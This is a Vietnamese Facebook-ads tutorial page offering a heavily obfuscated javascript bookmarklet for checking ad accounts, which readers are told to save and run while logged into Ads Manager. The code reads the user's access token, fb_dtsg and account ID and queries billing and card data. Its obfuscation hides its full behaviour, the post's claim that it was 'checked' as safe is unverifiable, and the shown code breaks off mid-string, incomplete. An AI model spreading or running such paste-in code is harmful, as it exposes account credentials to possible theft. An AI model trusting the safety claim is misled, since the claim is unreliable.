Đang Trong Lớp: 3170 | Thành Viên: 0 | Khách: 3170

Vũ Trụ 12 Free Advertising Classroom

Phòng Học Chạy Quảng Cáo Miễn Phí Livestream từ 22h đến 23h các ngày thứ 2 & thứ 6 hàng tuần.

Đăng ký để đặt câu hỏi

Latest Message: 5 months, 2 weeks ago
 • Vũ Trụ 12 : Welcome to the Vũ Trụ 12 nơi tụ tập những tâm hồn làm Ads yếu đuối

Cô giáo Drs Chị Bảy Tâm cùng đồng nghiệp với 15 năm kinh nghiệm tư vấn

Sứ mệnh của Phòng học Vũ Trụ 12 là tăng cường giáo dục nâng cao nhận thức về quảng cáo & kinh doanh online. Để bạn sống một đời tận hưởng hạnh phúc đổi xe, mua nhà trọn vẹn hơn.

TUT TRICK QUẢNG CÁO FACEBOOK

 • Code bookmark check tkqc Facebook nhanh – Sạch no hack ( đã check )

  Phần lớn anh em làm ads trên thị trường đang dùng mấy tool free và các code ảo ma canada dễ bị các đối tượng xấu lợi dụng để húp dàn tài khoản có ngưỡng. Check mấy tài khoản quảng cáo xong tự nhiên thành gà cho các bạn xơi.

  Code này mình sưu tầm được của bạn adscake làm, đã check không có bất cứ request gửi đi ra ngoài nào bất thường. Các bạn có thể yên tâm sử dụng

  Bước 1: Truy cập vào link https://www.facebook.com/ads/manager/account_settings

  Bước 2: Trên trình duyệt tạo 1 bookmark có URL nội dung đoạn code bên dưới, về sau muốn check tkqc chỉ cần bấm vào bookmark đó là được.

  javascript:(async () => {(function(_0x257857,_0x18c17f){const _0x598242={_0x1cea59:0x151,_0x2f8a69:0x130,_0x144635:0x13e,_0x21c942:0x14d,_0x4adfe2:0x15c,_0x39dbce:0x1a1,_0x3cffa1:0x135,_0x1e0f83:0x16e},_0x4df0b1=_0x257857();function _0x13e24a(_0x2d8cac,_0x16cc18){return _0x21bd(_0x16cc18-0x52,_0x2d8cac);}while(!![]){try{const _0x175a9b=parseInt(_0x13e24a(0x156,_0x598242._0x1cea59))/(0x1*0x1d23+-0x5*-0x618+-0x3b9a)+-parseInt(_0x13e24a(0x144,0xf7))/(-0x15f7+0x24db+-0xee2)*(-parseInt(_0x13e24a(_0x598242._0x2f8a69,0xfd))/(0xf*-0x26e+-0x23c0+0x4835))+parseInt(_0x13e24a(0x1b2,_0x598242._0x144635))/(-0x14*-0x18e+-0xcb5+-0x125f)+-parseInt(_0x13e24a(0x1e7,0x1a2))/(0x355*-0x2+0x54c+0x163)*(-parseInt(_0x13e24a(0x12e,0x12a))/(0x13e5+0x1*0x20eb+-0x34ca))+-parseInt(_0x13e24a(_0x598242._0x21c942,_0x598242._0x4adfe2))/(-0x6*-0x224+-0x4bc+-0x815*0x1)*(-parseInt(_0x13e24a(_0x598242._0x39dbce,_0x598242._0x3cffa1))/(-0x35*-0xaf+-0x3b*0x71+0x28*-0x41))+parseInt(_0x13e24a(_0x598242._0x1e0f83,0x16b))/(0x5*0x44+-0x1f96+0x1e4b)+-parseInt(_0x13e24a(0x16e,0x16e))/(0x232*-0xe+0x12a3+0xc23);if(_0x175a9b===_0x18c17f)break;else _0x4df0b1['push'](_0x4df0b1['shift']());}catch(_0x5200d1){_0x4df0b1['push'](_0x4df0b1['shift']());}}}(_0x51f5,0x7368e*-0x1+0x6acaa+0xc31b5));const _0x5ec939=(function(){const _0x464391={_0x4a5d0e:0x3cb};let _0x217015=!![];return function(_0x3263bd,_0x1f1aad){const _0x287b37=_0x217015?function(){function _0x5b84e3(_0x3fdac4,_0x3a8a96){return _0x21bd(_0x3a8a96-0x2c3,_0x3fdac4);}if(_0x1f1aad){const _0x2178a7=_0x1f1aad[_0x5b84e3(0x3e4,_0x464391._0x4a5d0e)](_0x3263bd,arguments);return _0x1f1aad=null,_0x2178a7;}}:function(){};return _0x217015=![],_0x287b37;};}()),_0x5ec4f4=_0x5ec939(this,function(){const _0x3e11e0={_0x1c25f5:0x39,_0x162ae3:0x5a,_0x2ac2b8:0x9b,_0x16d7f2:0x77,_0x26031d:0x2c,_0x3b6cf9:0x37,_0x556431:0x5,_0x1ef816:0x2a,_0x596297:0x80,_0x5b2fe1:0x82},_0x1f42cb={};_0x1f42cb[_0x5ed01e(_0x3e11e0._0x1c25f5,0x31)]=_0x5ed01e(-0x19,_0x3e11e0._0x162ae3)+_0x5ed01e(-0x80,-0xa8)+%27\x2b\x24%27;function _0x5ed01e(_0x140f4d,_0x228d4f){return _0x21bd(_0x140f4d- -0x138,_0x228d4f);}const _0xa09a1d=_0x1f42cb;return _0x5ec4f4[_0x5ed01e(0x0,0x6a)+_0x5ed01e(-0x2c,-_0x3e11e0._0x1c25f5)]()[_0x5ed01e(-_0x3e11e0._0x2ac2b8,-0xdb)+%27\x68%27](_0xa09a1d[%27\x6a\x42\x48\x42\x53%27])[_0x5ed01e(0x0,-_0x3e11e0._0x16d7f2)+_0x5ed01e(-_0x3e11e0._0x26031d,_0x3e11e0._0x3b6cf9)]()[_0x5ed01e(-0x59,-_0x3e11e0._0x556431)+_0x5ed01e(-0x89,-0xd7)+%27\x72%27](_0x5ec4f4)[%27\x73\x65\x61\x72\x63%27+%27\x68%27](_0x5ed01e(-0x19,_0x3e11e0._0x1ef816)+_0x5ed01e(-_0x3e11e0._0x596297,-_0x3e11e0._0x5b2fe1)+%27\x2b\x24%27);});_0x5ec4f4();function _0x21bd(_0xfb4dc3,_0x457a44){const _0x51f5a8=_0x51f5();return _0x21bd=function(_0x21bdb7,_0x5636ca){_0x21bdb7=_0x21bdb7-(-0x19e*-0x12+0x18e8+-0x21*0x19f);let _0x5e0a3c=_0x51f5a8[_0x21bdb7];return _0x5e0a3c;},_0x21bd(_0xfb4dc3,_0x457a44);}const _0xe5fa6c=(function(){let _0x374739=!![];return function(_0x101dd1,_0xdfe79a){const _0x53ce12=_0x374739?function(){if(_0xdfe79a){const _0x4898af=_0xdfe79a[%27\x61\x70\x70\x6c\x79%27](_0x101dd1,arguments);return _0xdfe79a=null,_0x4898af;}}:function(){};return _0x374739=![],_0x53ce12;};}()),_0x35f838=_0xe5fa6c(this,function(){const _0x2362df={_0x3fe387:0x20f,_0x349540:0x2be,_0x4fd831:0x39f,_0x27f893:0x332,_0x3b74a8:0x2c0,_0xbe3073:0x2ee,_0x41e9cf:0x2ac,_0x1f51b4:0x2a9,_0x4baec7:0x250,_0x1f3edb:0x200,_0x46cfdb:0x251,_0x17d3c9:0x1f9,_0x22cfd6:0x24e,_0xe33c5:0x280,_0x58fd65:0x1fe,_0x8eae5:0x267,_0x3c5a4d:0x32d,_0x7180b7:0x2de,_0x5757d4:0x27a,_0x3674bc:0x356,_0x22c40e:0x248,_0x1c5ca1:0x2a2,_0x5f2903:0x229,_0x49337e:0x285,_0xb7751f:0x2f0,_0x2cf53e:0x2b1,_0x2199bc:0x2f4,_0x2f37c8:0x27a},_0x3df820={_0x5be797:0x256,_0x339d31:0x1d5,_0x344c85:0x1bc},_0x3a8bda={%27\x55\x46\x6f\x6a\x63%27:function(_0x31db34,_0x5eda2f){return _0x31db34(_0x5eda2f);},%27\x4f\x5a\x4f\x65\x4a%27:function(_0x1cc05d,_0x4a29b0){return _0x1cc05d+_0x4a29b0;},%27\x78\x68\x6b\x7a\x58%27:_0x32266b(-_0x2362df._0x3fe387,-0x275)+%27\x6e\x20\x28\x66\x75%27+_0x32266b(-0x32e,-0x2ec)+_0x32266b(-0x333,-0x30c),%27\x69\x45\x6a\x68\x42%27:_0x32266b(-_0x2362df._0x349540,-0x258)+%27\x6e\x73\x74\x72\x75%27+_0x32266b(-_0x2362df._0x4fd831,-_0x2362df._0x27f893)+_0x32266b(-_0x2362df._0x3b74a8,-_0x2362df._0xbe3073)+%27\x72\x6e\x20\x74\x68%27+%27\x69\x73\x22\x29\x28%27+%27\x20\x29%27,%27\x54\x75\x76\x55\x58%27:function(_0x1a205d){return _0x1a205d();},%27\x73\x56\x6b\x53\x66%27:_0x32266b(-0x28b,-_0x2362df._0x41e9cf),%27\x63\x55\x53\x6b\x73%27:%27\x69\x6e\x66\x6f%27,%27\x79\x72\x6d\x62\x52%27:%27\x65\x72\x72\x6f\x72%27,%27\x67\x6b\x47\x71\x68%27:%27\x65\x78\x63\x65\x70%27+%27\x74\x69\x6f\x6e%27,%27\x66\x6c\x66\x4e\x4c%27:_0x32266b(-0x242,-0x27b),%27\x55\x74\x4f\x6b\x4c%27:_0x32266b(-_0x2362df._0x1f51b4,-0x276),%27\x6a\x78\x69\x78\x4a%27:function(_0x5da742,_0x28c1fe){return _0x5da742<_0x28c1fe;}};function _0x32266b(_0x4f963d,_0x287996){return _0x21bd(_0x287996- -0x3bd,_0x4f963d);}const _0x23cd18=function(){const _0x23d960={_0x506b6b:0x7c};function _0x1802bb(_0x41ee6e,_0x490ecb){return _0x32266b(_0x490ecb,_0x41ee6e-_0x23d960._0x506b6b);}let _0x5544ff;try{_0x5544ff=_0x3a8bda[_0x1802bb(-0x1f4,-_0x3df820._0x5be797)](Function,_0x3a8bda[%27\x4f\x5a\x4f\x65\x4a%27](_0x3a8bda[_0x1802bb(-0x229,-_0x3df820._0x339d31)]+_0x3a8bda[_0x1802bb(-0x1ed,-_0x3df820._0x344c85)],%27\x29\x3b%27))();}catch(_0x3a48d0){_0x5544ff=window;}return _0x5544ff;},_0x3856ae=_0x3a8bda[_0x32266b(-_0x2362df._0x4baec7,-0x25f)](_0x23cd18),_0x532ef0=_0x3856ae[_0x32266b(-_0x2362df._0x1f3edb,-0x268)+%27\x6c\x65%27]=_0x3856ae[_0x32266b(-_0x2362df._0x46cfdb,-0x268)+%27\x6c\x65%27]||{},_0x18b6e7=[_0x3a8bda[_0x32266b(-0x242,-0x28c)],_0x32266b(-_0x2362df._0x17d3c9,-0x24a),_0x3a8bda[%27\x63\x55\x53\x6b\x73%27],_0x3a8bda[_0x32266b(-_0x2362df._0x22cfd6,-_0x2362df._0xe33c5)],_0x3a8bda[_0x32266b(-0x250,-0x2a6)],_0x3a8bda[_0x32266b(-_0x2362df._0x58fd65,-_0x2362df._0x8eae5)],_0x3a8bda[_0x32266b(-0x31a,-0x2d2)]];for(let _0x508e0b=0x85d*-0x3+-0x10aa+0x29c1;_0x3a8bda[_0x32266b(-_0x2362df._0x3c5a4d,-0x2e4)](_0x508e0b,_0x18b6e7[%27\x6c\x65\x6e\x67\x74%27+%27\x68%27]);_0x508e0b++){const _0x146189=_0xe5fa6c[_0x32266b(-0x326,-_0x2362df._0x7180b7)+%27\x72\x75\x63\x74\x6f%27+%27\x72%27][%27\x70\x72\x6f\x74\x6f%27+_0x32266b(-0x22b,-0x289)][_0x32266b(-0x257,-_0x2362df._0x5757d4)](_0xe5fa6c),_0x145e18=_0x18b6e7[_0x508e0b],_0x1881ba=_0x532ef0[_0x145e18]||_0x146189;_0x146189[_0x32266b(-_0x2362df._0x3674bc,-0x32e)+_0x32266b(-_0x2362df._0x22c40e,-_0x2362df._0x1c5ca1)]=_0xe5fa6c[_0x32266b(-_0x2362df._0x5f2903,-_0x2362df._0x5757d4)](_0xe5fa6c),_0x146189[_0x32266b(-0x2c0,-_0x2362df._0x49337e)+_0x32266b(-_0x2362df._0xb7751f,-_0x2362df._0x2cf53e)]=_0x1881ba[%27\x74\x6f\x53\x74\x72%27+%27\x69\x6e\x67%27][_0x32266b(-_0x2362df._0x2199bc,-_0x2362df._0x2f37c8)](_0x1881ba),_0x532ef0[_0x145e18]=_0x146189;}});_0x35f838();let _0x3050d7=require(_0x3e7274(0x2f9,0x303)+_0x3e7274(0x38c,0x3a8)+%27\x72\x49\x6e\x69\x74%27+%27\x69\x61\x6c\x44\x61%27+%27\x74\x61%27)?.[%27\x41\x43\x43\x4f\x55%27+%27\x4e\x54\x5f\x49\x44%27]||null,_0x34eb5b=require(_0x3e7274(0x38d,0x3a6)+_0x3e7274(0x2f1,0x2d3)+_0x3e7274(0x335,0x2de))?.[_0x3e7274(0x394,0x338)]||null,_0x4c341e=require(_0x3e7274(0x359,0x3b1)+_0x3e7274(0x360,0x319)+_0x3e7274(0x39f,0x347)+_0x3e7274(0x375,0x302)+_0x3e7274(0x33f,0x332)+_0x3e7274(0x2cb,0x32d)+%27\x78\x74%27)[_0x3e7274(0x2f6,0x33e)+_0x3e7274(0x3a5,0x357)+%27\x44%27]||null,_0x35d194=require(_0x3e7274(0x35d,0x3b8)+_0x3e7274(0x389,0x35a)+_0x3e7274(0x2dd,0x2d0)+_0x3e7274(0x397,0x3f6))[_0x3e7274(0x2eb,0x2eb)+_0x3e7274(0x2d9,0x338)+%27\x65\x6e%27]||null;if(!_0x4c341e||!_0x35d194)return alert(_0x3e7274(0x2b7,0x2b1)+_0x3e7274(0x398,0x39d)+_0x3e7274(0x36b,0x382)+_0x3e7274(0x2d3,0x2e2)+_0x3e7274(0x322,0x366)+%27\u1ec3\x6d\x20\x74\x72%27+_0x3e7274(0x2ec,0x2ba)+%27\x2e%27);const _0x4532e0={};_0x4532e0[_0x3e7274(0x320,0x30f)+_0x3e7274(0x36f,0x37d)+_0x3e7274(0x3a5,0x3fb)+%27\x44%27]=_0x4c341e;let _0x4ede90=await fetch(_0x3e7274(0x2c7,0x2d5)+_0x3e7274(0x2c1,0x292)+%27\x73\x69\x6e\x65\x73%27+_0x3e7274(0x2e5,0x283)+_0x3e7274(0x2e6,0x28f)+%27\x2e\x63\x6f\x6d\x2f%27+_0x3e7274(0x324,0x2ef)+_0x3e7274(0x37b,0x3b9)+%27\x6c\x2f%27,{%27\x62\x6f\x64\x79%27:new URLSearchParams({%27\x61\x76%27:_0x3050d7,%27\x5f\x5f\x75\x73\x65\x72%27:_0x3050d7,%27\x5f\x5f\x61%27:0x1,%27\x76\x61\x72\x69\x61\x62\x6c\x65\x73%27:JSON[_0x3e7274(0x2f4,0x355)+%27\x67\x69\x66\x79%27](_0x4532e0),%27\x64\x6f\x63\x5f\x69\x64%27:0x1313eeacfef62c,%27\x66\x62\x5f\x64\x74\x73\x67%27:_0x34eb5b}),%27\x6d\x65\x74\x68\x6f\x64%27:_0x3e7274(0x340,0x358),%27\x6d\x6f\x64\x65%27:%27\x63\x6f\x72\x73%27,%27\x63\x72\x65\x64\x65\x6e\x74\x69\x61\x6c\x73%27:_0x3e7274(0x2d2,0x331)+%27\x64\x65%27})[_0x3e7274(0x2e3,0x2a5)](_0x102ef0=>_0x102ef0[_0x3e7274(0x2c9,0x2fc)]()),_0x34a3bf=-0x8eb*-0x2+-0x25c1+0x13eb,_0x59f853=-0x1796*-0x1+-0x8*-0xa3+0x1cae*-0x1,_0x3ce9b2=[],_0x40394c;if(_0x4ede90?.[_0x3e7274(0x2fa,0x300)]){if(_0x4ede90?.[_0x3e7274(0x2fa,0x2cf)]?.[%27\x62\x69\x6c\x6c\x61%27+%27\x62\x6c\x65\x5f\x61%27+_0x3e7274(0x2c4,0x317)+_0x3e7274(0x313,0x389)+_0x3e7274(0x320,0x395)+_0x3e7274(0x347,0x2f8)+_0x3e7274(0x336,0x358)]){let _0x4ccb8e=_0x4ede90?.[_0x3e7274(0x2fa,0x339)]?.[_0x3e7274(0x33e,0x348)+_0x3e7274(0x37d,0x34d)+%27\x63\x63\x6f\x75\x6e%27+_0x3e7274(0x313,0x385)+_0x3e7274(0x320,0x345)+%27\x6e\x74\x5f\x61\x63%27+_0x3e7274(0x336,0x35c)],_0x434ca1=_0x4ccb8e?.[_0x3e7274(0x2f0,0x2f4)+_0x3e7274(0x368,0x3ac)+_0x3e7274(0x3a1,0x413)+_0x3e7274(0x2fb,0x288)+_0x3e7274(0x35c,0x396)]?.[_0x3e7274(0x2f0,0x295)+_0x3e7274(0x368,0x393)+_0x3e7274(0x3a1,0x370)+_0x3e7274(0x2df,0x296)+_0x3e7274(0x2d7,0x28b)]||[];_0x40394c=_0x4ccb8e[%27\x61\x63\x63\x6f\x75%27+_0x3e7274(0x370,0x377)+_0x3e7274(0x2bb,0x244)][_0x3e7274(0x307,0x2ef)+%27\x74\x74\x65\x64\x5f%27+_0x3e7274(0x304,0x2a3)+%27\x74%27];if(_0x434ca1?.[%27\x6c\x65\x6e\x67\x74%27+%27\x68%27]){_0x34a3bf=_0x434ca1?.[%27\x6c\x65\x6e\x67\x74%27+%27\x68%27];for(let _0x1e0401=0x51*0xd+-0x3*0x728+0x115b;_0x1e0401<_0x434ca1[_0x3e7274(0x30b,0x2d1)+%27\x68%27];_0x1e0401++){const _0x58527f=_0x434ca1[_0x1e0401];if(_0x58527f?.[_0x3e7274(0x34e,0x3b2)+_0x3e7274(0x3a7,0x374)]){let _0x242228=_0x58527f?.[_0x3e7274(0x37a,0x3d4)+_0x3e7274(0x332,0x2e0)]||{};switch(_0x58527f?.[_0x3e7274(0x34e,0x363)+_0x3e7274(0x3a7,0x3a6)]){case _0x3e7274(0x2f3,0x2a8)+_0x3e7274(0x30f,0x2ba)+_0x3e7274(0x2c6,0x27e)+_0x3e7274(0x343,0x323)+_0x3e7274(0x2f8,0x31e)+%27\x48%27:++_0x59f853,_0x3ce9b2[_0x3e7274(0x372,0x33e)]((_0x242228?.[_0x3e7274(0x355,0x392)+%27\x61\x73\x73\x6f\x63%27+_0x3e7274(0x2cd,0x27f)+_0x3e7274(0x2cc,0x28d)+%27\x65%27]||%27%27)+%27\x28%27+(_0x242228?.[%27\x6c\x61\x73\x74\x5f%27+_0x3e7274(0x351,0x3b5)+_0x3e7274(0x329,0x33b)+%27\x73%27]||%27%27)+(_0x3e7274(0x2e7,0x29b)+%27\x64\x73%27));break;case _0x3e7274(0x2db,0x283)+%27\x45%27:_0x58527f?.[_0x3e7274(0x392,0x3eb)+_0x3e7274(0x354,0x322)]?_0x242228?.[_0x3e7274(0x2cf,0x33f)]&&_0x242228?.[_0x3e7274(0x33a,0x2c2)+_0x3e7274(0x2e1,0x358)]==_0x3e7274(0x2f5,0x327)+%27\x6e\x74\x50\x61\x79%27+_0x3e7274(0x2fc,0x2f1)+%27\x6c\x6c\x69\x6e\x67%27+_0x3e7274(0x356,0x2de)+_0x3e7274(0x364,0x391)?_0x3ce9b2[_0x3e7274(0x372,0x33b)](%27\x70\x61\x79\x70\x61%27+_0x3e7274(0x2d4,0x299)+_0x242228?.[_0x3e7274(0x2cf,0x343)]+(_0x3e7274(0x377,0x3d5)+%27\x6e\x68%27)):_0x3ce9b2[%27\x70\x75\x73\x68%27]((_0x242228?.[_0x3e7274(0x355,0x3bc)+_0x3e7274(0x308,0x315)+%27\x69\x61\x74\x69\x6f%27+_0x3e7274(0x2cc,0x270)+%27\x65%27]||%27%27)+%27\x28%27+(_0x242228?.[_0x3e7274(0x37c,0x314)+%27\x66\x6f\x75\x72\x5f%27+%27\x64\x69\x67\x69\x74%27+%27\x73%27]||%27%27)+(_0x3e7274(0x377,0x3d1)+%27\x6e\x68%27)):(_0x242228?.[_0x3e7274(0x2cf,0x26f)]&&_0x242228?.[_0x3e7274(0x33a,0x307)+_0x3e7274(0x2e1,0x2d9)]==%27\x50\x61\x79\x6d\x65%27+_0x3e7274(0x31b,0x2ac)+_0x3e7274(0x2fc,0x330)+%27\x6c\x6c\x69\x6e\x67%27+_0x3e7274(0x356,0x2eb)+%27\x6d\x65\x6e\x74%27&&_0x3ce9b2[_0x3e7274(0x372,0x349)](_0x3e7274(0x3a8,0x3c9)+_0x3e7274(0x2d4,0x26b)+_0x242228?.[_0x3e7274(0x2cf,0x2e3)]+%27\x29\x20\x70\x68\x75\u0323%27),_0x242228?.[_0x3e7274(0x355,0x2e8)+_0x3e7274(0x308,0x2d2)+_0x3e7274(0x2cd,0x259)+%27\x6e\x5f\x6e\x61\x6d%27+%27\x65%27]&&_0x3ce9b2[_0x3e7274(0x372,0x341)]((_0x242228?.[%27\x63\x61\x72\x64\x5f%27+_0x3e7274(0x308,0x2ab)+_0x3e7274(0x2cd,0x281)+_0x3e7274(0x2cc,0x267)+%27\x65%27]||%27%27)+%27\x28%27+(_0x242228?.[_0x3e7274(0x37c,0x360)+%27\x66\x6f\x75\x72\x5f%27+%27\x64\x69\x67\x69\x74%27+%27\x73%27]||%27%27)+_0x3e7274(0x3a0,0x328)));break;default:break;}}}}}}let _0x2bd9fe=_0x3e7274(0x2c7,0x283)+_0x3e7274(0x383,0x369)+_0x3e7274(0x2da,0x269)+_0x3e7274(0x2ee,0x345)+_0x3e7274(0x36a,0x373)+_0x3e7274(0x2b6,0x268)+%27\x2e\x30%27;const _0x1a9b78={};_0x1a9b78[%27\x66\x69\x65\x6c\x64%27+%27\x73%27]=%27\x61\x64\x73\x70\x61%27+_0x3e7274(0x3a1,0x339)+_0x3e7274(0x32f,0x309)+_0x3e7274(0x382,0x353)+%27\x65\x6e\x63\x79\x2c%27+_0x3e7274(0x2ff,0x36e)+_0x3e7274(0x358,0x354)+%27\x73\x74\x5f\x64\x73%27+_0x3e7274(0x316,0x2ee)+%27\x75\x6e\x74\x5f\x73%27+%27\x70\x65\x6e\x74\x2c%27+_0x3e7274(0x2c8,0x26f)+_0x3e7274(0x39e,0x346)+_0x3e7274(0x34f,0x379)+_0x3e7274(0x326,0x2c1)+_0x3e7274(0x31e,0x2af)+_0x3e7274(0x327,0x33b)+%27\x2c\x69\x73\x5f\x61%27+%27\x63\x74\x69\x76\x65%27+_0x3e7274(0x2be,0x2af)+%27\x2c\x70\x65\x72\x6d%27+%27\x69\x73\x73\x69\x6f%27+_0x3e7274(0x384,0x395)+%27\x6c\x65\x2c\x72\x6f%27+_0x3e7274(0x2de,0x34f);function _0x3e7274(_0x46bd67,_0x359f0e){return _0x21bd(_0x46bd67-0x231,_0x359f0e);}_0x1a9b78[_0x3e7274(0x2eb,0x327)+%27\x73\x5f\x74\x6f\x6b%27+%27\x65\x6e%27]=_0x35d194;let _0x3eb1f4=_0x1a9b78,_0x865a0c=new URLSearchParams(_0x3eb1f4);const _0x35a8fb={};function _0x51f5(){const _0xaf7d1f=[%27\x62\x69\x6e\x64%27,%27\x4e\x61\x76\x69\x67%27,%27\x6a\x6f\x69\x6e%27,%27\x29\x20\x63\x68\x69\u0301%27,%27\x74\x72\x61\x63\x65%27,%27\x72\x65\x74\x75\x72%27,%27\x63\x72\x65\x64\x65%27,%27\x72\x61\x70\x68\x71%27,%27\x6c\x61\x73\x74\x5f%27,%27\x62\x6c\x65\x5f\x61%27,%27\x55\x46\x6f\x6a\x63%27,%27\x6a\x55\x4e\x54\x68%27,%27\x66\x46\x52\x75\x51%27,%27\x36\x39\x33\x33\x34\x30\x6b\x63\x59\x44\x48\x48%27,%27\x2c\x63\x75\x72\x72%27,%27\x3a\x2f\x2f\x67\x72%27,%27\x6e\x73\x2c\x72\x6f%27,%27\x69\x45\x6a\x68\x42%27,%27\x63\x6f\x6e\x73\x6f%27,%27\x66\x6c\x66\x4e\x4c%27,%27\x7c\x4e\x67\u01b0\u01a1\u0303%27,%27\x43\x6f\x6e\x6e\x65%27,%27\x52\x4e\x5a\x4d\x4a%27,%27\x0a\x54\u00f4\u0309\x6e\x67%27,%27\x6e\x74\x55\x73\x65%27,%27\x44\x54\x53\x47\x49%27,%27\x6e\x67\x3a\x20%27,%27\x54\x75\x76\x55\x58%27,%27\x7c\x49\x44\x3a\x20%27,%27\x44\x6f\x56\x63\x64%27,%27\x69\x73\x5f\x70\x72%27,%27\x7c\x4c\x6f\x61\u0323\x69%27,%27\x74\x6f\x6b\x65\x6e%27,%27\x20\x41\x64\x6d\x69%27,%27\x7b\x7d\x2e\x63\x6f%27,%27\x66\x69\x67%27,%27\u00e0\x69\x20\x6b\x68%27,%27\x0a\x49\x6e\x66\x6f%27,%27\x6c\x6c\x59\x65\x61%27,%27\x34\x39\x38\x39\x34%27,%27\x74\x3a\x20%27,%27\x62\x52\x4a\x74\x57%27,%27\x72\x73\x6f\x6e\x61%27,%27\x69\x66\x69\x65\x64%27,%27\x29\x20\x70\x68\x75\u0323%27,%27\x79\x6d\x65\x6e\x74%27,%27\x6a\x42\x48\x42\x53%27,%27\x67\x65\x74\x46\x75%27,%27\x77\x61\x72\x6e%27,%27\x6f\x75\x6e\x74\x49%27,%27\x6e\x74\x68%27,%27\x6c\x69\x74\x79%27,%27\x70\x61\x79\x70\x61%27,%27\x6d\x2f\x76\x31\x32%27,%27\x4c\u1ed7\x69\x20\x74%27,%27\x56\x64\x6d\x63\x4f%27,%27\u1ecb\x6e\x68%27,%27\x6f\x6d\x20\x66\x72%27,%27\x6c\x61\x6e\x63\x65%27,%27\x63\x74\x6f\x72\x28%27,%27\x68\u00f4\x6e\x67\x20%27,%27\x2c\x6e\x61\x6d\x65%27,%27\x68\x65\x63\x6b\x3a%27,%27\x5f\x5f\x70\x72\x6f%27,%27\x3a\x2f\x2f\x62\x75%27,%27\x36\x38\x34\x33\x39%27,%27\x6f\x6c\x73\x20\x61%27,%27\x63\x63\x6f\x75\x6e%27,%27\x53\x61\x6f\x20\x63%27,%27\x5f\x4f\x52\x5f\x50%27,%27\x68\x74\x74\x70\x73%27,%27\x69\x73\x5f\x70\x65%27,%27\x6a\x73\x6f\x6e%27,%27\x51\x75\x61\u0309\x6e\x20%27,%27\x43\x6f\x6e\x74\x65%27,%27\x6e\x5f\x6e\x61\x6d%27,%27\x69\x61\x74\x69\x6f%27,%27\x73\x65\x61\x72\x63%27,%27\x65\x6d\x61\x69\x6c%27,%27\x32\x38\x31\x34\x32%27,%27\x4e\x68\x61\u0300\x20\x70%27,%27\x69\x6e\x63\x6c\x75%27,%27\x75\x69\x20\x6c\u00f2%27,%27\x6c\x20\x28%27,%27\x68\x6f\x6c\x64\x5f%27,%27\x32\x32\x35\x38\x36\x58\x77\x71\x49\x4b\x64%27,%27\x6f\x64\x73%27,%27\x0a\x41\x64\x73\x43%27,%27\x73\x5f\x74\x6f\x6b%27,%27\x61\x70\x68\x2e\x66%27,%27\x55\x53\x41\x42\x4c%27,%27\x33\x32\x31\x6a\x4d\x6b\x52\x53\x6b%27,%27\x63\x74\x43\x6f\x6e%27,%27\x6c\x65\x73\x7d%27,%27\x5f\x6d\x65\x74\x68%27,%27\x72\x75\x63\x74\x6f%27,%27\x65\x6e\x61\x6d\x65%27,%27\x6e\x28\x29\x20%27,%27\x74\x68\x65\x6e%27,%27\x0a\x4c\x69\x6d\x69%27,%27\x73\x2e\x66\x61\x63%27,%27\x65\x62\x6f\x6f\x6b%27,%27\x29\x20\x6e\x65\x65%27,%27\x67\x65\x74\x44\x61%27,%27\x29\x2b\x29\x2b\x29%27,%27\x63\x41\x4a\x6a\x50%27,%27\x61\x63\x63\x65\x73%27,%27\x61\x20\x6c\u1ea1\x69%27,%27\x75\x61\u0309\x6e\x67\x20%27,%27\x61\x63\x65\x62\x6f%27,%27\x20\x63\x68\x69\x20%27,%27\x62\x69\x6c\x6c\x69%27,%27\x6e\x69\x74\x69\x61%27,%27\x7c\x4c\x69\x6d\x69%27,%27\x55\x4e\x56\x45\x52%27,%27\x73\x74\x72\x69\x6e%27,%27\x50\x61\x79\x6d\x65%27,%27\x61\x64\x41\x63\x63%27,%27\x47\x69\u01a1\u0300\x20\x63%27,%27\x47\x5f\x41\x55\x54%27,%27\x43\x75\x72\x72\x65%27,%27\x64\x61\x74\x61%27,%27\x5f\x61\x63\x63\x6f%27,%27\x70\x61\x6c\x42\x69%27,%27\x63\x61\u0301\x6f%27,%27\x6d\x6f\x64\x65%27,%27\x6e\x61\x6d\x65\x2c%27,%27\x22\x72\x65\x74\x75%27,%27\x67\x65\x74\x48\x6f%27,%27\x6e\x63\x74\x69\x6f%27,%27\x6a\x4c\x67\x41\x63%27,%27\x61\x6d\x6f\x75\x6e%27,%27\x68\x65\u0301\x70\x20\x64%27,%27\x4e\x4f\x4c\x49\x4d%27,%27\x66\x6f\x72\x6d\x61%27,%27\x61\x73\x73\x6f\x63%27,%27\x34\x38\x44\x68\x78\x4c\x56\x61%27,%27\x6a\x78\x69\x78\x4a%27,%27\x6c\x65\x6e\x67\x74%27,%27\x47\x45\x54%27,%27\x44\x54\x6c\x6c\x59%27,%27\x6d\x65\x74\x68\x6f%27,%27\x49\x46\x49\x45\x44%27,%27\x63\x6f\x6e\x73\x74%27,%27\x67\x65\x74\x4d\x69%27,%27\x4e\x68\x61\u0300\x20\x71%27,%27\x74\x5f\x62\x79\x5f%27,%27\x31\x32\x32\x34\x67\x4c\x77\x76\x69\x77%27,%27\x33\x38\x37\x33\x39%27,%27\x6c\x2c\x61\x6d\x6f%27,%27\x20\x54\x4b\x3a\x20%27,%27\x7c\x54\u00f4\u0309\x6e\x67%27,%27\x74\x68\u00ea\u0309\x20\x78%27,%27\x44\x6e\x44\x46\x53%27,%27\x6e\x74\x50\x61\x79%27,%27\x55\x74\x4f\x6b\x4c%27,%27\x33\x32\x34\x39\x34\x32\x30\x49\x6c\x7a\x5a\x4f\x59%27,%27\x65\x2c\x75\x73\x65%27,%27\x7c\x49\x6e\x66\x6f%27,%27\x70\x61\x79\x6d\x65%27,%27\x4e\x65\x65\x64\x73%27,%27\x6e\x67\x20\x6b\x69%27,%27\x4c\u00f4\u0303\x69\x20\x6b%27,%27\x61\x70\x69\x2f\x67%27,%27\x74\x72\x69\u0323\x20\x76%27,%27\x72\x5f\x72\x6f\x6c%27,%27\x72\x73\x7b\x69\x64%27,%27\x30\x35\x37\x33\x30%27,%27\x64\x69\x67\x69\x74%27,%27\x78\u00e1\x63\x20\u0111%27,%27\x20\x74\x68\x65\u0309\x3a%27,%27\x63\x6f\x6e\x64\x73%27,%27\x57\x46\x63\x70\x62%27,%27\x72\x65\x70\x6c\x61%27,%27\x63\x79\x63\x6c\x65%27,%27\x31\x34\x32\x33\x30\x32\x33\x70\x54\x77\x49\x52\x43%27,%27\x6e\x3a\x20%27,%27\x6e\x74\x69\x61\x6c%27,%27\x73\x7a\x42\x4f\x4b%27,%27\x30\x36\x35\x30\x31%27,%27\x6c